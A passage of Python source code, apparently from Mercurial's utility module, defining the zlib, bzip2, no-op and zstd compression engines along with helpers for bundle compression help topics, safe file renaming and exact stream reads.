        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of format
        support by server and client. The highest integer is advertised
        first. Integers with non-positive values aren't advertised.

        The priority values are somewhat arbitrary and only used for default
        ordering. The relative order can be changed via config options.

        If wire protocol compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of bytes of chunks representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)`` that
        returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``RevlogError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()
3493
3493
class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and size.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        return 'x'

    def compressstream(self, it, opts=None):
        level = (opts or {}).get('level', -1)
        z = zlib.compressobj(level)
        for chunk in it:
            compressed = z.compress(chunk)
            # compress() does not emit data on every call; it is cheaper
            # to skip empty results here than to feed them downstream.
            if compressed:
                yield compressed

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            decomp = zlib.decompressobj()
            for data in filechunkiter(fh):
                while data:
                    # Cap each output chunk at 256k to limit memory use.
                    yield decomp.decompress(data, 2 ** 18)
                    data = decomp.unconsumed_tail

        return chunkbuffer(gen())

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 44:
                # Too small to ever compress usefully.
                return None

            if insize <= 1000000:
                compressed = zlib.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            z = zlib.compressobj()
            pieces = []
            offset = 0
            while offset < insize:
                end = offset + 2**20
                pieces.append(z.compress(data[offset:end]))
                offset = end
            pieces.append(z.flush())

            if sum(len(p) for p in pieces) < insize:
                return ''.join(pieces)
            return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        str(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())
3580
3580
class _bz2engine(compressionengine):
    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # A protocol name is declared but not advertised by default (both
    # priorities are 0) because the algorithm is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        level = (opts or {}).get('level', 9)
        z = bz2.BZ2Compressor(level)
        for chunk in it:
            compressed = z.compress(chunk)
            if compressed:
                yield compressed

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            decomp = bz2.BZ2Decompressor()
            for chunk in filechunkiter(fh):
                yield decomp.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_bz2engine())
3623
3623
class _truncatedbz2engine(compressionengine):
    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        # No user-facing bundle spec name: internal wire format only.
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled elsewhere.

    def decompressorreader(self, fh):
        def gen():
            # The input stream doesn't have the 'BZ' header. So add it back.
            decompressor = bz2.BZ2Decompressor()
            decompressor.decompress('BZ')
            for chunk in filechunkiter(fh):
                yield decompressor.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_truncatedbz2engine())
3644
3644
class _noopengine(compressionengine):
    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't because
    # unless you are on a fast network, uncompressed payloads can easily
    # saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        # Identity transform: chunks pass through untouched.
        return it

    def decompressorreader(self, fh):
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            # None signals that no compressed form is produced.
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()

compengines.register(_noopengine())
3679
3679
class _zstdengine(compressionengine):
    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
        # Not all installs have the zstd module available. So defer importing
        # until first access.
        try:
            from . import zstd
            # Force delayed import.
            zstd.__version__
            return zstd
        except ImportError:
            return None

    def available(self):
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        return '\x28'

    def compressstream(self, it, opts=None):
        opts = opts or {}
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = opts.get('level', 3)

        zstd = self._module
        cobj = zstd.ZstdCompressor(level=level).compressobj()
        for chunk in it:
            out = cobj.compress(chunk)
            if out:
                yield out

        yield cobj.flush()

    def decompressorreader(self, fh):
        zstd = self._module
        dctx = zstd.ZstdDecompressor()
        return chunkbuffer(dctx.read_from(fh))

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # Writing the content size adds a few bytes to the output. However,
            # it allows decompression to be more optimal since we can
            # pre-allocate a buffer to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level,
                                             write_content_size=True)
            self._dctx = zstd.ZstdDecompressor()
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                # Inputs this small essentially never shrink; don't bother.
                return None

            if insize <= 1000000:
                # One-shot compression for moderately sized inputs. Only
                # keep the result if it is actually smaller.
                compressed = self._cctx.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None

            # Large input: stream it through the compressor in
            # recommended-size windows.
            cobj = self._cctx.compressobj()
            pieces = []
            for pos in range(0, insize, self._compinsize):
                piece = cobj.compress(data[pos:pos + self._compinsize])
                if piece:
                    pieces.append(piece)
            pieces.append(cobj.flush())

            if sum(len(p) for p in pieces) < insize:
                return ''.join(pieces)
            return None

        def decompress(self, data):
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                pieces = []
                for pos in range(0, insize, self._decompinsize):
                    piece = dobj.decompress(data[pos:pos + self._decompinsize])
                    if piece:
                        pieces.append(piece)
                # Frame should be exhausted, so no finish() API.

                return ''.join(pieces)
            except Exception as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        str(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))

compengines.register(_zstdengine())
3808
3808
def bundlecompressiontopics():
    """Obtains a list of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    items = {}

    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    for engname in compengines:
        engine = compengines[engname]

        # Skip engines whose backing module is unavailable.
        if not engine.available():
            continue

        # Skip engines without a user-facing bundle spec name.
        bt = engine.bundletype()
        if not bt or not bt[0]:
            continue

        formatted = pycompat.sysstr('``%s``\n %s') % (
            bt[0], engine.bundletype.__doc__)

        entry = docobject()
        entry.__doc__ = formatted
        entry._origdoc = engine.bundletype.__doc__
        entry._origfunc = engine.bundletype

        items[bt[0]] = entry

    return items
3840
3840
# NOTE(review): presumably consumed by the i18n tooling so the dynamically
# built bundletype docstrings get translated — confirm against the i18n
# extraction scripts.
i18nfunctions = bundlecompressiontopics().values()

# convenient shortcut
dst = debugstacktrace
3845
3845
def safename(f, tag, ctx, others=None):
    """
    Generate a name that it is safe to rename f to in the given context.

    f: filename to rename
    tag: a string tag that will be included in the new name
    ctx: a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    if others is None:
        others = set()

    def _isfree(candidate):
        # A candidate is usable when neither the context nor the extra
        # name set already contains it.
        return candidate not in ctx and candidate not in others

    candidate = '%s~%s' % (f, tag)
    if _isfree(candidate):
        return candidate

    # Append an increasing counter until we find an unused name.
    for n in itertools.count(1):
        candidate = '%s~%s~%s' % (f, tag, n)
        if _isfree(candidate):
            return candidate
3868
def readexactly(stream, n):
    '''read n bytes from stream.read and abort if less was available'''
    data = stream.read(n)
    if len(data) == n:
        return data
    # A short read means the stream was truncated; surface that to the
    # user rather than returning partial data.
    raise error.Abort(_("stream ended unexpectedly"
                        " (got %d bytes, expected %d)")
                      % (len(data), n))
General Comments 0
You need to be logged in to leave comments. Login now